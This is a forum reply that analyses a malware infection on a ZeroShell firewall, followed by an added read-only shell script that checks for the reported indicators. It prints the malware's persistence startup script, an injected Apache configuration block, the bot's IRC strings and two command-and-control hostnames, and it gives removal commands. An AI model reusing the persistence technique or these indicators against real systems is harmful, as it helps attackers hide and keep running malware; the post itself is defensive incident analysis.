Reply To: DoS on DNS Zeroshell: Malware!


#52997

fsala
Member

In short:

The issue is a hidden executable (/DB/.DB.001) running in the background that opens thousands of connections to the DNS.
Its file attributes are set to hide it and to make deletion harder.


root@zeroshell DB> ls -al
total 131252
drwxr-xr-x 4 root root 4096 Oct 21 17:09 .
drwxr-xr-x 21 root root 520 Nov 6 12:55 ..
-rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
drwxr-xr-x 7 root root 4096 Jul 2 2012 _DB.001
drwx------ 2 root root 16384 Apr 20 2011 lost+found
-rw-r--r-- 1 root root 134217728 Apr 20 2011 swap-file

root@zeroshell DB> lsattr .DB.001
-u--ia .DB.001

To deactivate/rename it:


killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware

I analyzed the activity with “strace”: there are thousands of connections to the DNS with queries for “zeroshell.will.mx” and “zeroshell.samhan.biz”, and the binary contains code to open an IRC connection (like a lot of worms).

The executable starts at boot from the “Database Update” script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.


# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
httpd=$(pidof httpd);kill -HUP $httpd
fi

# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
/DB/.DB.001
fi
echo "OK"

It also changes the SSL configuration of Apache:


# C100-Security-Fix-beta12

SSLOptions +StdEnvVars
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* - [F]

The binary payload contains these kinds of strings (IRC connection, browser emulation…), so I’m sure it’s malware:


zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost

At the moment I don’t know what the infection entry point was, but I suspect a bug in the OpenSSL library or in that area…

Hope it helps!

Fabrizio Sala/Netdream
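The following is an added example and not part of the post above nor of ZeroShell itself: a read-only sweep that checks a box (or a mounted disk image) for the indicators the post reports, i.e. the hidden /DB/.DB.001 binary, the i/a/u attributes on it, the two hostnames, a startup script that relaunches the binary, and the "C100-Security-Fix-beta12" marker in Apache's ssl.conf. The post only says the persistence script lives in the "Startup/Cron area", so searching under /Database for it is an assumption of this example.

```shell
#!/bin/sh
# Added example (not from the original post, not ZeroShell code): IOC sweep
# for the .DB.001 infection. Paths and strings are those reported in the
# post; the location of the startup/cron scripts under /Database is an
# ASSUMPTION of this example.
# Usage: sh ioc_check.sh [ROOT]   (ROOT defaults to /; pass a mount point
#                                   to inspect an offline image)

# Return 0 when an lsattr flag string shows any of the flags the post found
# on the binary: i (immutable), a (append-only), u (undeletable); 1 otherwise.
has_protective_attrs() {
    case "$1" in
        *i*|*a*|*u*) return 0 ;;
        *) return 1 ;;
    esac
}

# Sweep ROOT for the indicators. Prints every hit and returns the number of
# hits as its exit status, so 0 means "nothing found".
check_db001_iocs() {
    root="${1:-/}"
    root="${root%/}"          # "/" becomes "", so "$root/DB" is "/DB"
    hits=0
    bin="$root/DB/.DB.001"

    # 1. the hidden executable itself
    if [ -f "$bin" ]; then
        echo "IOC: hidden executable present: $bin"
        hits=$((hits + 1))

        # 2. chattr flags that protect it from deletion (skipped quietly when
        #    lsattr is missing or the filesystem does not support flags)
        if command -v lsattr >/dev/null 2>&1; then
            attrs=$(lsattr -d "$bin" 2>/dev/null | awk '{print $1}')
            if [ -n "$attrs" ] && has_protective_attrs "$attrs"; then
                echo "IOC: protective attributes on $bin: $attrs"
                hits=$((hits + 1))
            fi
        fi

        # 3. the C2 hostnames seen in strace and in the binary's strings
        if grep -aqE 'zeroshell\.(will\.mx|samhan\.biz)' "$bin" 2>/dev/null; then
            echo "IOC: C2 hostname string inside $bin"
            hits=$((hits + 1))
        fi
    fi

    # 4. persistence: a startup/cron script that (re)launches .DB.001
    #    (ASSUMPTION: those scripts live under /Database)
    if [ -d "$root/Database" ]; then
        found=$(grep -rl '\.DB\.001' "$root/Database" 2>/dev/null || true)
        if [ -n "$found" ]; then
            echo "IOC: .DB.001 referenced by startup script(s):"
            echo "$found"
            hits=$((hits + 1))
        fi
    fi

    # 5. the marker the malware leaves in Apache's SSL configuration
    if grep -q 'C100-Security-Fix-beta12' "$root/etc/httpd/ssl.conf" 2>/dev/null; then
        echo "IOC: C100-Security-Fix-beta12 marker in $root/etc/httpd/ssl.conf"
        hits=$((hits + 1))
    fi

    echo "total IOC hits: $hits"
    return $hits
}

check_db001_iocs "$@"
```

The sweep only reads; the post's own one-liner (killall, chattr -iua, mv) is the removal step, and the ssl.conf block and the "Database Update" script still have to be cleaned by hand afterwards, otherwise the script restarts the binary within two minutes.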